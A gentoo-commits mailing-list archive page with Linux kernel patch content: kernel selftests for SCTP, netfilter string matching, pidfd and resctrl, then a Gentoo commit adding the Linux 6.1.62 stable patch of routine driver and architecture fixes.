+@@ -0,0 +1,99 @@
++// SPDX-License-Identifier: GPL-2.0
++
++#include <stdio.h>
++#include <stdlib.h>
++#include <string.h>
++#include <unistd.h>
++#include <arpa/inet.h>
++
++int main(int argc, char *argv[])
++{
++	struct sockaddr_in saddr = {}, daddr = {};
++	int sd, ret, len = sizeof(daddr);
++	struct timeval tv = {25, 0};
++	char buf[] = "hello";
++
++	if (argc != 6 || (strcmp(argv[1], "server") && strcmp(argv[1], "client"))) {
++		printf("%s <server|client> <LOCAL_IP> <LOCAL_PORT> <REMOTE_IP> <REMOTE_PORT>\n",
++		       argv[0]);
++		return -1;
++	}
++
++	sd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP);
++	if (sd < 0) {
++		printf("Failed to create sd\n");
++		return -1;
++	}
++
++	saddr.sin_family = AF_INET;
++	saddr.sin_addr.s_addr = inet_addr(argv[2]);
++	saddr.sin_port = htons(atoi(argv[3]));
++
++	ret = bind(sd, (struct sockaddr *)&saddr, sizeof(saddr));
++	if (ret < 0) {
++		printf("Failed to bind to address\n");
++		goto out;
++	}
++
++	ret = listen(sd, 5);
++	if (ret < 0) {
++		printf("Failed to listen on port\n");
++		goto out;
++	}
++
++	daddr.sin_family = AF_INET;
++	daddr.sin_addr.s_addr = inet_addr(argv[4]);
++	daddr.sin_port = htons(atoi(argv[5]));
++
++	/* make test shorter than 25s */
++	ret = setsockopt(sd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
++	if (ret < 0) {
++		printf("Failed to setsockopt SO_RCVTIMEO\n");
++		goto out;
++	}
++
++	if (!strcmp(argv[1], "server")) {
++		sleep(1); /* wait a bit for client's INIT */
++		ret = connect(sd, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to connect to peer\n");
++			goto out;
++		}
++		ret = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *)&daddr, &len);
++		if (ret < 0) {
++			printf("Failed to recv msg %d\n", ret);
++			goto out;
++		}
++		ret = sendto(sd, buf, strlen(buf) + 1, 0, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to send msg %d\n", ret);
++			goto out;
++		}
++		printf("Server: sent! %d\n", ret);
++	}
++
++	if (!strcmp(argv[1], "client")) {
++		usleep(300000); /* wait a bit for server's listening */
++		ret = connect(sd, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to connect to peer\n");
++			goto out;
++		}
++		sleep(1); /* wait a bit for server's delayed INIT_ACK to reproduce the issue */
++		ret = sendto(sd, buf, strlen(buf) + 1, 0, (struct sockaddr *)&daddr, len);
++		if (ret < 0) {
++			printf("Failed to send msg %d\n", ret);
++			goto out;
++		}
++		ret = recvfrom(sd, buf, sizeof(buf), 0, (struct sockaddr *)&daddr, &len);
++		if (ret < 0) {
++			printf("Failed to recv msg %d\n", ret);
++			goto out;
++		}
++		printf("Client: rcvd! %d\n", ret);
++	}
++	ret = 0;
++out:
++	close(sd);
++	return ret;
++}
+diff --git a/tools/testing/selftests/netfilter/xt_string.sh b/tools/testing/selftests/netfilter/xt_string.sh
+new file mode 100755
+index 0000000000000..1802653a47287
+--- /dev/null
++++ b/tools/testing/selftests/netfilter/xt_string.sh
+@@ -0,0 +1,128 @@
++#!/bin/bash
++# SPDX-License-Identifier: GPL-2.0
++
++# return code to signal skipped test
++ksft_skip=4
++rc=0
++
++if ! iptables --version >/dev/null 2>&1; then
++	echo "SKIP: Test needs iptables"
++	exit $ksft_skip
++fi
++if ! ip -V >/dev/null 2>&1; then
++	echo "SKIP: Test needs iproute2"
++	exit $ksft_skip
++fi
++if ! nc -h >/dev/null 2>&1; then
++	echo "SKIP: Test needs netcat"
++	exit $ksft_skip
++fi
++
++pattern="foo bar baz"
++patlen=11
++hdrlen=$((20 + 8)) # IPv4 + UDP
++ns="ns-$(mktemp -u XXXXXXXX)"
++trap 'ip netns del $ns' EXIT
++ip netns add "$ns"
++ip -net "$ns" link add d0 type dummy
++ip -net "$ns" link set d0 up
++ip -net "$ns" addr add 10.1.2.1/24 dev d0
++
++#ip netns exec "$ns" tcpdump -npXi d0 &
++#tcpdump_pid=$!
++#trap 'kill $tcpdump_pid; ip netns del $ns' EXIT
++
++add_rule() { # (alg, from, to)
++	ip netns exec "$ns" \
++		iptables -A OUTPUT -o d0 -m string \
++			--string "$pattern" --algo $1 --from $2 --to $3
++}
++showrules() { # ()
++	ip netns exec "$ns" iptables -v -S OUTPUT | grep '^-A'
++}
++zerorules() {
++	ip netns exec "$ns" iptables -Z OUTPUT
++}
++countrule() { # (pattern)
++	showrules | grep -c -- "$*"
++}
++send() { # (offset)
++	( for ((i = 0; i < $1 - $hdrlen; i++)); do
++		printf " "
++	  done
++	  printf "$pattern"
++	) | ip netns exec "$ns" nc -w 1 -u 10.1.2.2 27374
++}
++
++add_rule bm 1000 1500
++add_rule bm 1400 1600
++add_rule kmp 1000 1500
++add_rule kmp 1400 1600
++
++zerorules
++send 0
++send $((1000 - $patlen))
++if [ $(countrule -c 0 0) -ne 4 ]; then
++	echo "FAIL: rules match data before --from"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1000
++send $((1400 - $patlen))
++if [ $(countrule -c 2) -ne 2 ]; then
++	echo "FAIL: only two rules should match at low offset"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1500 - $patlen))
++if [ $(countrule -c 1) -ne 4 ]; then
++	echo "FAIL: all rules should match at end of packet"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1495
++if [ $(countrule -c 1) -ne 1 ]; then
++	echo "FAIL: only kmp with proper --to should match pattern spanning fragments"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1500
++if [ $(countrule -c 1) -ne 2 ]; then
++	echo "FAIL: two rules should match pattern at start of second fragment"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1600 - $patlen))
++if [ $(countrule -c 1) -ne 2 ]; then
++	echo "FAIL: two rules should match pattern at end of largest --to"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send $((1600 - $patlen + 1))
++if [ $(countrule -c 1) -ne 0 ]; then
++	echo "FAIL: no rules should match pattern extending largest --to"
++	showrules
++	((rc--))
++fi
++
++zerorules
++send 1600
++if [ $(countrule -c 1) -ne 0 ]; then
++	echo "FAIL: no rule should match pattern past largest --to"
++	showrules
++	((rc--))
++fi
++
++exit $rc
+diff --git a/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c b/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
+index 3fd8e903118f5..3bc46d6151f44 100644
+--- a/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
++++ b/tools/testing/selftests/pidfd/pidfd_fdinfo_test.c
+@@ -62,7 +62,7 @@ static void error_report(struct error *err, const char *test_name)
+ 		break;
+ 
+ 	case PIDFD_PASS:
+-		ksft_test_result_pass("%s test: Passed\n");
++		ksft_test_result_pass("%s test: Passed\n", test_name);
+ 		break;
+ 
+ 	default:
+diff --git a/tools/testing/selftests/pidfd/pidfd_test.c b/tools/testing/selftests/pidfd/pidfd_test.c
+index e2dd4ed849846..cf4f3174c83e0 100644
+--- a/tools/testing/selftests/pidfd/pidfd_test.c
++++ b/tools/testing/selftests/pidfd/pidfd_test.c
+@@ -380,13 +380,13 @@ static int test_pidfd_send_signal_syscall_support(void)
+ 
+ static void *test_pidfd_poll_exec_thread(void *priv)
+ {
+-	ksft_print_msg("Child Thread: starting. pid %d tid %d ; and sleeping\n",
++	ksft_print_msg("Child Thread: starting. pid %d tid %ld ; and sleeping\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	ksft_print_msg("Child Thread: doing exec of sleep\n");
+ 
+ 	execl("/bin/sleep", "sleep", str(CHILD_THREAD_MIN_WAIT), (char *)NULL);
+ 
+-	ksft_print_msg("Child Thread: DONE. pid %d tid %d\n",
++	ksft_print_msg("Child Thread: DONE. pid %d tid %ld\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	return NULL;
+ }
+@@ -426,7 +426,7 @@ static int child_poll_exec_test(void *args)
+ {
+ 	pthread_t t1;
+ 
+-	ksft_print_msg("Child (pidfd): starting. pid %d tid %d\n", getpid(),
++	ksft_print_msg("Child (pidfd): starting. pid %d tid %ld\n", getpid(),
+ 			syscall(SYS_gettid));
+ 	pthread_create(&t1, NULL, test_pidfd_poll_exec_thread, NULL);
+ 	/*
+@@ -479,10 +479,10 @@ static void test_pidfd_poll_exec(int use_waitpid)
+ 
+ static void *test_pidfd_poll_leader_exit_thread(void *priv)
+ {
+-	ksft_print_msg("Child Thread: starting. pid %d tid %d ; and sleeping\n",
++	ksft_print_msg("Child Thread: starting. pid %d tid %ld ; and sleeping\n",
+ 			getpid(), syscall(SYS_gettid));
+ 	sleep(CHILD_THREAD_MIN_WAIT);
+-	ksft_print_msg("Child Thread: DONE. pid %d tid %d\n", getpid(), syscall(SYS_gettid));
++	ksft_print_msg("Child Thread: DONE. pid %d tid %ld\n", getpid(), syscall(SYS_gettid));
+ 	return NULL;
+ }
+ 
+@@ -491,7 +491,7 @@ static int child_poll_leader_exit_test(void *args)
+ {
+ 	pthread_t t1, t2;
+ 
+-	ksft_print_msg("Child: starting. pid %d tid %d\n", getpid(), syscall(SYS_gettid));
++	ksft_print_msg("Child: starting. pid %d tid %ld\n", getpid(), syscall(SYS_gettid));
+ 	pthread_create(&t1, NULL, test_pidfd_poll_leader_exit_thread, NULL);
+ 	pthread_create(&t2, NULL, test_pidfd_poll_leader_exit_thread, NULL);
+ 
+diff --git a/tools/testing/selftests/resctrl/resctrl_tests.c b/tools/testing/selftests/resctrl/resctrl_tests.c
+index df0d8d8526fc6..4418155a879b9 100644
+--- a/tools/testing/selftests/resctrl/resctrl_tests.c
++++ b/tools/testing/selftests/resctrl/resctrl_tests.c
+@@ -228,9 +228,14 @@ int main(int argc, char **argv)
+ 		return ksft_exit_skip("Not running as root. Skipping...\n");
+ 
+ 	if (has_ben) {
++		if (argc - ben_ind >= BENCHMARK_ARGS)
++			ksft_exit_fail_msg("Too long benchmark command.\n");
++
+ 		/* Extract benchmark command from command line. */
+ 		for (i = ben_ind; i < argc; i++) {
+ 			benchmark_cmd[i - ben_ind] = benchmark_cmd_area[i];
++			if (strlen(argv[i]) >= BENCHMARK_ARG_SIZE)
++				ksft_exit_fail_msg("Too long benchmark command argument.\n");
+ 			sprintf(benchmark_cmd[i - ben_ind], "%s", argv[i]);
+ 		}
+ 		benchmark_cmd[ben_count] = NULL;


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-11-08 14:02 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-11-08 14:02 UTC (permalink / raw
  To: gentoo-commits

commit:     b6b4af36aa8079ef0c7c6cf9c05b3c1a59be66e0
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Nov  8 14:02:18 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Nov  8 14:02:18 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=b6b4af36

Linux patch 6.1.62

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1061_linux-6.1.62.patch | 1798 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1802 insertions(+)

diff --git a/0000_README b/0000_README
index 78a774ef..3a96d6b9 100644
--- a/0000_README
+++ b/0000_README
@@ -287,6 +287,10 @@ Patch:  1060_linux-6.1.61.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.61
 
+Patch:  1061_linux-6.1.62.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.62
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1061_linux-6.1.62.patch b/1061_linux-6.1.62.patch
new file mode 100644
index 00000000..9c94ec46
--- /dev/null
+++ b/1061_linux-6.1.62.patch
@@ -0,0 +1,1798 @@
+diff --git a/Makefile b/Makefile
+index 635474f38aaa9..2e7bc3cc1c177 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 61
++SUBLEVEL = 62
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index c7e9c96719fa3..f42a3be5f28d7 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -68,11 +68,11 @@ void copy_user_highpage(struct page *to, struct page *from,
+ {
+ 	void *vfrom, *vto;
+ 
+-	vto = kmap_atomic(to);
+-	vfrom = kmap_atomic(from);
++	vfrom = kmap_local_page(from);
++	vto = kmap_local_page(to);
+ 	copy_page(vto, vfrom);
+-	kunmap_atomic(vfrom);
+-	kunmap_atomic(vto);
++	kunmap_local(vfrom);
++	kunmap_local(vto);
+ 	/* Make sure this page is cleared on other CPU's too before using it */
+ 	smp_wmb();
+ }
+@@ -228,6 +228,7 @@ pgd_t swapper_pg_dir[_PTRS_PER_PGD] __section(".bss..swapper_pg_dir");
+ pgd_t invalid_pg_dir[_PTRS_PER_PGD] __page_aligned_bss;
+ #ifndef __PAGETABLE_PUD_FOLDED
+ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
++EXPORT_SYMBOL(invalid_pud_table);
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+diff --git a/arch/powerpc/kernel/head_85xx.S b/arch/powerpc/kernel/head_85xx.S
+index 52c0ab416326a..0e16aea7853b8 100644
+--- a/arch/powerpc/kernel/head_85xx.S
++++ b/arch/powerpc/kernel/head_85xx.S
+@@ -394,7 +394,7 @@ interrupt_base:
+ #ifdef CONFIG_PPC_FPU
+ 	FP_UNAVAILABLE_EXCEPTION
+ #else
+-	EXCEPTION(0x0800, FP_UNAVAIL, FloatingPointUnavailable, unknown_exception)
++	EXCEPTION(0x0800, FP_UNAVAIL, FloatingPointUnavailable, emulation_assist_interrupt)
+ #endif
+ 
+ 	/* System Call Interrupt */
+diff --git a/arch/powerpc/kernel/setup-common.c b/arch/powerpc/kernel/setup-common.c
+index efb301a4987ca..59b4ac57bfaf7 100644
+--- a/arch/powerpc/kernel/setup-common.c
++++ b/arch/powerpc/kernel/setup-common.c
+@@ -946,6 +946,8 @@ void __init setup_arch(char **cmdline_p)
+ 
+ 	/* Parse memory topology */
+ 	mem_topology_setup();
++	/* Set max_mapnr before paging_init() */
++	set_max_mapnr(max_pfn);
+ 
+ 	/*
+ 	 * Release secondary cpus out of their spinloops at 0x60 now that
+diff --git a/arch/powerpc/mm/mem.c b/arch/powerpc/mm/mem.c
+index 84d171953ba44..c7599b1737099 100644
+--- a/arch/powerpc/mm/mem.c
++++ b/arch/powerpc/mm/mem.c
+@@ -288,7 +288,6 @@ void __init mem_init(void)
+ #endif
+ 
+ 	high_memory = (void *) __va(max_low_pfn * PAGE_SIZE);
+-	set_max_mapnr(max_pfn);
+ 
+ 	kasan_late_init();
+ 
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index c871a6d6364ca..4194aa4c5f0e0 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -822,8 +822,7 @@ void svm_set_x2apic_msr_interception(struct vcpu_svm *svm, bool intercept)
+ 	if (intercept == svm->x2avic_msrs_intercepted)
+ 		return;
+ 
+-	if (avic_mode != AVIC_MODE_X2 ||
+-	    !apic_x2apic_mode(svm->vcpu.arch.apic))
++	if (avic_mode != AVIC_MODE_X2)
+ 		return;
+ 
+ 	for (i = 0; i < MAX_DIRECT_ACCESS_MSRS; i++) {
+diff --git a/drivers/dma/ste_dma40.c b/drivers/dma/ste_dma40.c
+index 3b09fdc507e04..594b016e76efc 100644
+--- a/drivers/dma/ste_dma40.c
++++ b/drivers/dma/ste_dma40.c
+@@ -3697,6 +3697,7 @@ static int __init d40_probe(struct platform_device *pdev)
+ 		regulator_disable(base->lcpa_regulator);
+ 		regulator_put(base->lcpa_regulator);
+ 	}
++	pm_runtime_disable(base->dev);
+ 
+ 	kfree(base->lcla_pool.alloc_map);
+ 	kfree(base->lookup_log_chans);
+diff --git a/drivers/firmware/efi/efi.c b/drivers/firmware/efi/efi.c
+index b43e5e6ddaf6e..b7c0e8cc0764f 100644
+--- a/drivers/firmware/efi/efi.c
++++ b/drivers/firmware/efi/efi.c
+@@ -245,9 +245,13 @@ static __init int efivar_ssdt_load(void)
+ 		if (status == EFI_NOT_FOUND) {
+ 			break;
+ 		} else if (status == EFI_BUFFER_TOO_SMALL) {
+-			name = krealloc(name, name_size, GFP_KERNEL);
+-			if (!name)
++			efi_char16_t *name_tmp =
++				krealloc(name, name_size, GFP_KERNEL);
++			if (!name_tmp) {
++				kfree(name);
+ 				return -ENOMEM;
++			}
++			name = name_tmp;
+ 			continue;
+ 		}
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+index d2139ac121595..1ed2142a6e7bf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ctx.c
+@@ -47,7 +47,6 @@ const unsigned int amdgpu_ctx_num_entities[AMDGPU_HW_IP_NUM] = {
+ bool amdgpu_ctx_priority_is_valid(int32_t ctx_prio)
+ {
+ 	switch (ctx_prio) {
+-	case AMDGPU_CTX_PRIORITY_UNSET:
+ 	case AMDGPU_CTX_PRIORITY_VERY_LOW:
+ 	case AMDGPU_CTX_PRIORITY_LOW:
+ 	case AMDGPU_CTX_PRIORITY_NORMAL:
+@@ -55,6 +54,7 @@ bool amdgpu_ctx_priority_is_valid(int32_t ctx_prio)
+ 	case AMDGPU_CTX_PRIORITY_VERY_HIGH:
+ 		return true;
+ 	default:
++	case AMDGPU_CTX_PRIORITY_UNSET:
+ 		return false;
+ 	}
+ }
+@@ -64,7 +64,8 @@ amdgpu_ctx_to_drm_sched_prio(int32_t ctx_prio)
+ {
+ 	switch (ctx_prio) {
+ 	case AMDGPU_CTX_PRIORITY_UNSET:
+-		return DRM_SCHED_PRIORITY_UNSET;
++		pr_warn_once("AMD-->DRM context priority value UNSET-->NORMAL");
++		return DRM_SCHED_PRIORITY_NORMAL;
+ 
+ 	case AMDGPU_CTX_PRIORITY_VERY_LOW:
+ 		return DRM_SCHED_PRIORITY_MIN;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
+index 7bd8e33b14be5..e8b3e9520cf6e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_dma_buf.c
+@@ -400,7 +400,10 @@ amdgpu_dma_buf_move_notify(struct dma_buf_attachment *attach)
+ 				continue;
+ 		}
+ 
+-		r = amdgpu_vm_clear_freed(adev, vm, NULL);
++		/* Reserve fences for two SDMA page table updates */
++		r = dma_resv_reserve_fences(resv, 2);
++		if (!r)
++			r = amdgpu_vm_clear_freed(adev, vm, NULL);
+ 		if (!r)
+ 			r = amdgpu_vm_handle_moved(adev, vm);
+ 
+diff --git a/drivers/gpu/drm/ttm/ttm_device.c b/drivers/gpu/drm/ttm/ttm_device.c
+index b84f74807ca13..ec9ddaad56a05 100644
+--- a/drivers/gpu/drm/ttm/ttm_device.c
++++ b/drivers/gpu/drm/ttm/ttm_device.c
+@@ -239,10 +239,6 @@ void ttm_device_fini(struct ttm_device *bdev)
+ 	struct ttm_resource_manager *man;
+ 	unsigned i;
+ 
+-	man = ttm_manager_type(bdev, TTM_PL_SYSTEM);
+-	ttm_resource_manager_set_used(man, false);
+-	ttm_set_driver_manager(bdev, TTM_PL_SYSTEM, NULL);
+-
+ 	mutex_lock(&ttm_global_mutex);
+ 	list_del(&bdev->device_list);
+ 	mutex_unlock(&ttm_global_mutex);
+@@ -252,6 +248,10 @@ void ttm_device_fini(struct ttm_device *bdev)
+ 	if (ttm_bo_delayed_delete(bdev, true))
+ 		pr_debug("Delayed destroy list was clean\n");
+ 
++	man = ttm_manager_type(bdev, TTM_PL_SYSTEM);
++	ttm_resource_manager_set_used(man, false);
++	ttm_set_driver_manager(bdev, TTM_PL_SYSTEM, NULL);
++
+ 	spin_lock(&bdev->lru_lock);
+ 	for (i = 0; i < TTM_MAX_BO_PRIORITY; ++i)
+ 		if (list_empty(&man->lru[0]))
+diff --git a/drivers/hwtracing/coresight/coresight-tmc-etr.c b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+index 1be0e5e0e80b2..c88a6afb29512 100644
+--- a/drivers/hwtracing/coresight/coresight-tmc-etr.c
++++ b/drivers/hwtracing/coresight/coresight-tmc-etr.c
+@@ -610,7 +610,8 @@ static int tmc_etr_alloc_flat_buf(struct tmc_drvdata *drvdata,
+ 
+ 	flat_buf->vaddr = dma_alloc_noncoherent(real_dev, etr_buf->size,
+ 						&flat_buf->daddr,
+-						DMA_FROM_DEVICE, GFP_KERNEL);
++						DMA_FROM_DEVICE,
++						GFP_KERNEL | __GFP_NOWARN);
+ 	if (!flat_buf->vaddr) {
+ 		kfree(flat_buf);
+ 		return -ENOMEM;
+diff --git a/drivers/input/mouse/synaptics.c b/drivers/input/mouse/synaptics.c
+index d2c9f4cbd00c6..e43e93ac2798a 100644
+--- a/drivers/input/mouse/synaptics.c
++++ b/drivers/input/mouse/synaptics.c
+@@ -1753,6 +1753,7 @@ static int synaptics_create_intertouch(struct psmouse *psmouse,
+ 		psmouse_matches_pnp_id(psmouse, topbuttonpad_pnp_ids) &&
+ 		!SYN_CAP_EXT_BUTTONS_STICK(info->ext_cap_10);
+ 	const struct rmi_device_platform_data pdata = {
++		.reset_delay_ms = 30,
+ 		.sensor_pdata = {
+ 			.sensor_type = rmi_sensor_touchpad,
+ 			.axis_align.flip_y = true,
+diff --git a/drivers/input/rmi4/rmi_smbus.c b/drivers/input/rmi4/rmi_smbus.c
+index c130468541b7d..7080c2ddbaf2b 100644
+--- a/drivers/input/rmi4/rmi_smbus.c
++++ b/drivers/input/rmi4/rmi_smbus.c
+@@ -235,12 +235,29 @@ static void rmi_smb_clear_state(struct rmi_smb_xport *rmi_smb)
+ 
+ static int rmi_smb_enable_smbus_mode(struct rmi_smb_xport *rmi_smb)
+ {
+-	int retval;
++	struct i2c_client *client = rmi_smb->client;
++	int smbus_version;
++
++	/*
++	 * psmouse driver resets the controller, we only need to wait
++	 * to give the firmware chance to fully reinitialize.
++	 */
++	if (rmi_smb->xport.pdata.reset_delay_ms)
++		msleep(rmi_smb->xport.pdata.reset_delay_ms);
+ 
+ 	/* we need to get the smbus version to activate the touchpad */
+-	retval = rmi_smb_get_version(rmi_smb);
+-	if (retval < 0)
+-		return retval;
++	smbus_version = rmi_smb_get_version(rmi_smb);
++	if (smbus_version < 0)
++		return smbus_version;
++
++	rmi_dbg(RMI_DEBUG_XPORT, &client->dev, "Smbus version is %d",
++		smbus_version);
++
++	if (smbus_version != 2 && smbus_version != 3) {
++		dev_err(&client->dev, "Unrecognized SMB version %d\n",
++				smbus_version);
++		return -ENODEV;
++	}
+ 
+ 	return 0;
+ }
+@@ -253,11 +270,10 @@ static int rmi_smb_reset(struct rmi_transport_dev *xport, u16 reset_addr)
+ 	rmi_smb_clear_state(rmi_smb);
+ 
+ 	/*
+-	 * we do not call the actual reset command, it has to be handled in
+-	 * PS/2 or there will be races between PS/2 and SMBus.
+-	 * PS/2 should ensure that a psmouse_reset is called before
+-	 * intializing the device and after it has been removed to be in a known
+-	 * state.
++	 * We do not call the actual reset command, it has to be handled in
++	 * PS/2 or there will be races between PS/2 and SMBus. PS/2 should
++	 * ensure that a psmouse_reset is called before initializing the
++	 * device and after it has been removed to be in a known state.
+ 	 */
+ 	return rmi_smb_enable_smbus_mode(rmi_smb);
+ }
+@@ -273,7 +289,6 @@ static int rmi_smb_probe(struct i2c_client *client,
+ {
+ 	struct rmi_device_platform_data *pdata = dev_get_platdata(&client->dev);
+ 	struct rmi_smb_xport *rmi_smb;
+-	int smbus_version;
+ 	int error;
+ 
+ 	if (!pdata) {
+@@ -312,18 +327,9 @@ static int rmi_smb_probe(struct i2c_client *client,
+ 	rmi_smb->xport.proto_name = "smb";
+ 	rmi_smb->xport.ops = &rmi_smb_ops;
+ 
+-	smbus_version = rmi_smb_get_version(rmi_smb);
+-	if (smbus_version < 0)
+-		return smbus_version;
+-
+-	rmi_dbg(RMI_DEBUG_XPORT, &client->dev, "Smbus version is %d",
+-		smbus_version);
+-
+-	if (smbus_version != 2 && smbus_version != 3) {
+-		dev_err(&client->dev, "Unrecognized SMB version %d\n",
+-				smbus_version);
+-		return -ENODEV;
+-	}
++	error = rmi_smb_enable_smbus_mode(rmi_smb);
++	if (error)
++		return error;
+ 
+ 	i2c_set_clientdata(client, rmi_smb);
+ 
+diff --git a/drivers/irqchip/irq-riscv-intc.c b/drivers/irqchip/irq-riscv-intc.c
+index 499e5f81b3fe3..4b66850978e6e 100644
+--- a/drivers/irqchip/irq-riscv-intc.c
++++ b/drivers/irqchip/irq-riscv-intc.c
+@@ -110,8 +110,16 @@ static int __init riscv_intc_init(struct device_node *node,
+ 	 * for each INTC DT node. We only need to do INTC initialization
+ 	 * for the INTC DT node belonging to boot CPU (or boot HART).
+ 	 */
+-	if (riscv_hartid_to_cpuid(hartid) != smp_processor_id())
++	if (riscv_hartid_to_cpuid(hartid) != smp_processor_id()) {
++		/*
++		 * The INTC nodes of each CPU are suppliers for downstream
++		 * interrupt controllers (such as PLIC, IMSIC and APLIC
++		 * direct-mode) so we should mark an INTC node as initialized
++		 * if we are not creating IRQ domain for it.
++		 */
++		fwnode_dev_initialized(of_fwnode_handle(node), true);
+ 		return 0;
++	}
+ 
+ 	intc_domain = irq_domain_add_linear(node, BITS_PER_LONG,
+ 					    &riscv_intc_domain_ops, NULL);
+diff --git a/drivers/irqchip/irq-stm32-exti.c b/drivers/irqchip/irq-stm32-exti.c
+index 8bbb2b114636c..dc6f67decb022 100644
+--- a/drivers/irqchip/irq-stm32-exti.c
++++ b/drivers/irqchip/irq-stm32-exti.c
+@@ -458,6 +458,7 @@ static const struct irq_domain_ops irq_exti_domain_ops = {
+ 	.map	= irq_map_generic_chip,
+ 	.alloc  = stm32_exti_alloc,
+ 	.free	= stm32_exti_free,
++	.xlate	= irq_domain_xlate_twocell,
+ };
+ 
+ static void stm32_irq_ack(struct irq_data *d)
+diff --git a/drivers/misc/pci_endpoint_test.c b/drivers/misc/pci_endpoint_test.c
+index d1e2f22537dbe..55dc16d8f6adb 100644
+--- a/drivers/misc/pci_endpoint_test.c
++++ b/drivers/misc/pci_endpoint_test.c
+@@ -71,6 +71,7 @@
+ #define PCI_DEVICE_ID_TI_AM654			0xb00c
+ #define PCI_DEVICE_ID_TI_J7200			0xb00f
+ #define PCI_DEVICE_ID_TI_AM64			0xb010
++#define PCI_DEVICE_ID_TI_J721S2		0xb013
+ #define PCI_DEVICE_ID_LS1088A			0x80c0
+ 
+ #define is_am654_pci_dev(pdev)		\
+@@ -1004,6 +1005,9 @@ static const struct pci_device_id pci_endpoint_test_tbl[] = {
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_AM64),
+ 	  .driver_data = (kernel_ulong_t)&j721e_data,
+ 	},
++	{ PCI_DEVICE(PCI_VENDOR_ID_TI, PCI_DEVICE_ID_TI_J721S2),
++	  .driver_data = (kernel_ulong_t)&j721e_data,
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(pci, pci_endpoint_test_tbl);
+diff --git a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
+index 8d719f82854a9..76de55306c4d0 100644
+--- a/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
++++ b/drivers/net/ethernet/chelsio/cxgb4/t4_hw.c
+@@ -3816,6 +3816,8 @@ int t4_load_phy_fw(struct adapter *adap, int win,
+ 		 FW_PARAMS_PARAM_Z_V(FW_PARAMS_PARAM_DEV_PHYFW_DOWNLOAD));
+ 	ret = t4_set_params_timeout(adap, adap->mbox, adap->pf, 0, 1,
+ 				    &param, &val, 30000);
++	if (ret)
++		return ret;
+ 
+ 	/* If we have version number support, then check to see that the new
+ 	 * firmware got loaded properly.
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index c34974f7dfd26..345e341d22338 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -3655,6 +3655,8 @@ static void r8153b_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
++				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
+ 					break;
+@@ -3695,6 +3697,8 @@ static void r8153c_ups_en(struct r8152 *tp, bool enable)
+ 			int i;
+ 
+ 			for (i = 0; i < 500; i++) {
++				if (test_bit(RTL8152_UNPLUG, &tp->flags))
++					return;
+ 				if (ocp_read_word(tp, MCU_TYPE_PLA, PLA_BOOT_CTRL) &
+ 				    AUTOLOAD_DONE)
